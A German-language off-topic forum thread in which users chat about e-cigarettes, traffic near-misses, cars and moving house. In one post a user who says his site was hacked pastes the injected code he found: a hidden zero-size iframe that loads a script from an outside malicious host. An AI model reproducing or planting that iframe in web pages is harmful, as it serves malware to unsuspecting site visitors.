off off topic quasselfred

  • Seit 08:30 heut früh ;0)

    GZ

    die sollen gut sein, sag ma bescheid wie es war^^

    Da kommt man Samstags morgens zu dem Laden und während wir unsere Ersten Sorten ausprobiert haben, klingelte schon dauernt das Telefon bei dem Typen und man hörte so Sprüche wie "Solange hier kein Gesetzestext vorliegt verkauf ich das Zeug weiter" ... Wir also weiter so am testen und irgendwann kommt ein Anruf von der Chefin von dem Typen, die meinte er solle den Laden dicht machen. Dann kam er natürlich an und wollte uns rauswerfen und wir wollten natürlich jetzt auch so ein Ding haben, wenn wir schon dahintuckern. Die Chefin meinte wohl er dürfe ab sofort sicherheitshalber nichts mehr verkaufen weil an dem Morgen in der Zeitung stand das Liquid in NRW verboten wurde. Aber schlussendlich hat er uns dann doch noch die ego-C verkauft, nachdem wir hartnäckig geblieben sind.
    Hab auch seit Samstag keine Kippe mehr geraucht. Ich muss sagen, man muss sich erstmal dran gewöhnen, weil geschmacklich ist es schon anders, aber das Ding killt den Schmacht, die Hände stinken nicht mehr und der Rest von einem selbst auch nicht mehr. Wenn man neben einem sitzt, der gerade dampft und diese Person einem nicht direkt ins Gesicht pustet, dann riecht man auch echt garnichts.
    Natürlich muss ich bandit auch Recht geben, dumme Sprüche muss man sich zu Beginn erstmal anhören, ich glaube das wird auch noch eine Weile anhalten^^ aber ein Kollege hat sich auch erstmal direkt eine bestellt, naja mal schaun. Ich rauch jetzt erstmal ca. 100-150ml von dem Zeug und dann hab ich die Kosten auch schon wieder draußen und dann mal schaun.

    Gruß crAzywuLf :D

  • dampf-wulf..^^

    ja wenn die das in nrw so sehen.. ich kann dqa nur müde lächeln, dann sind ja zigaretten auch arzneimittel, da sind ja noch mehr stoffe, als nur nikotin drin^^

    die sind alle plemm plemm und am ende isses nur die tabak-industrie, die dahinter steckt und nem korrupten plitikfuzzi wieder n paar euros hinschiebt.. ;)

    wulf, dann deckste dich ein, wenn du nach hessen kommst..^^
    oder ich schick dir was ;)

    PS hab den corsa wieder zurück gebracht und mein geld geholt... tragende teile komplett durchgerostet...

    naja jetzt hab ich nen nissan note für 7k € unterm listenpreis :) (in weiß)
    bekommich wohl am 29ten :)

  • Jaja^^
    aber mein Vater war gestern auch nochmal in dem Laden und die verticken jetzt doch wieder Liquid ^^ lustig... Die meinten auch das wenn es wirklich Stress gibt, die Produktion nach Tschechien verlagert wird und dann unter der Theke vertickt wird haha...
    Ich wurde heute morgen einfach fast niedergebrettert... Da nimmt mich mein Nachbar mit runter ins Dorf und lässt mich an der Kreuzung raus und ich lauf halt auf die andere Seite und seh in der Mitte so, dass ein dicker Bulli um die Ecke biegt... Nachdem ich dann fast auf der anderen Seite war schau ich wieder so rüber und der war plötzlich direkt vor mir und ich nur noch Bunnyhop gemacht und wurde glücklicherweise nur vom Seitenspiegel erwischt. Die Frau war voll neben Kappe, die hatte anscheinend noch keinen Kaffee intus. Der Beifahrer hat mich anscheinend auch nicht gesehen... hätt ich nicht so schnell reagiert wär mein Becken warscheinlich dran gewesen^^nix passiert von daher noch alles ok ... gut das ich früher immer soviel EGO-Shooter gezockt hab :mrgreen:

    Gruß crAzywuLf :D

  • oh mann das is mir gestern ähnlich ergangen.. nur war ich nich vor, sondern im auto!
    wollte abbiegen, hinter mir ne rote ampel, nen lieber bmw-fahrer gibt mir die lichthupe und will mich vorlassen.. ich will grad anfahren, nein korrektur, ich bin grad angefahren da schreit anita aufm beifahrersitz rum, dass ich bremsen soll.
    ich steig in die eisen, denk mir: häh? der hat doch lichthupe gegeben....

    was weder der typ im bmw noch meinereiner gesehen haben war die dicke oma in schwarzen und braunen klamotten!! und als ich dann vor ihr zum stehen kam is die alte nichma verschreckt rumgehüpft oder ausgewichen oder so, sondern wie ein reh im fernlicht stehen geblieben und dann hat se noch doof geguckt...

    total üble situation.
    aber ich hab die alte echt nich bemerkt..

  • so ne A******** S*****************************************....
    seit ein paar Tagen hab ich einen Wurm drauf und heute hab ich ihn endlich gelöscht bekommen (Nachdem ich: Antivir, Spyware Doctor, Ad Aware, TDDSKiller, CCleaner, Hijackthis und Spyware Doctor verwendet habe)... Da schau ich zufällig auf eine meiner privaten Seiten und die wurde einfach gehackt...
    Womöglich durch diesen Trojaner oder was auch immer das war... F***
    In jeder scheiss Datei auf meinem Webroot steht jetzt:

    Code
    <!--qpi--><!--/qpi-->
    <!--qpi--><iframe src=http://s1.kaluchka1.in/gate.php?f=881710   frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=0 height=0 border=0></iframe><!--/qpi-->


    ich könnte ausflippen... ich weiss noch nicht mal ob ich ein Backup oder so noch irgendwo hab so eine s***************... Alle Javascript Dateien sind jetzt fehlerhaft und alle HTML Dateien haben diesen ver******* IFrame drin..
    MMMMMMMMMMMMMMMMMMMMAAAAAANNNOOOO... Dumm ist der der privat nicht auch Keypass benutzt... so eine VERDAMMTE ************************* ... Liest der einfach Passwörter aus WinSCP aus....
    :smilie027:
    ohje ich will garnicht wissen was der Typ womöglich jetzt mit meinen Passwörtern aus dem Firefox macht, falls er Sie hat... Onlinebanking hab ich ja hier auch noch benutzt so eine sc*********************
    OMG
    Nehmt euch in acht vor einer lvvm.exe oder BF5.exe.
    ich änder jetzt erstmal alle Passwörter die es nur gibt...

    Gruß crAzywuLf :D

    2 Mal editiert, zuletzt von crAzywuLf (9. Januar 2012 um 22:15)

  • naja so der Brüller war meins jetzt auch nicht... 8 Zeichen (Buchstaben und Zahlen) ? Wie viel hattest du damals denn? Ich bin mir immernoch nicht sicher, ob dies jetzt durch den Trojaner den ich auf dem Rechner hatte entstanden ist oder durch Bruteforce :\ Zeitlich gesehen könnte der Trojaner den ich mir eingefangen hab gut dafür verantwortlich sein, aber schon wunderlich das der Passwörter aus WinSCP ausliest. So wirklich viel konnte ich auch noch nicht darüber in Erfahrung bringen, weil es sehr wenig Infos dazu im Internet gibt, sowohl zu dem HEUR:Trojan.Script.Iframer auf meinem Webspace als auch zu dieser http://lvvm.exe/BF5.exe die ich am Rechner hatte :?

    Gruß crAzywuLf :D

  • happy happier happiest sweet :)

    mja irgendwie kommt der thread hier gar nicht mehr in wallung. schaaade leute, ich bin wirklich enttäuscht von euch.:?

  • ach iwie is derzeit überall entweder die luft raus oder zu viel zu tun...
    und nen offline-pc zu haben is auch mau :( bin ma gespannt, wann ich wieder netz am start hab.

    aber ich muss gestehen es is schon angenehm egoshooter über nen beamer zu zocken :mrgreen:

  • dauert aber wirklich lange. hatte mich schon gewundert warum bisher musiktechnisch noch nichts kam.

  • jop ich hab auch kein Inet in der Wohnung^^ bin seit Mittwoch ausgezogen :) Eigentlich funktioniert noch so gut wie nichts in der Wohnung, aber immerhin hab ich jetzt einen funktionierenden Kühlschrank mit viel Bier drin. Bekomme aber am 10ten unitymedia mit DSL 64000 :)

    Gruß crAzywuLf :D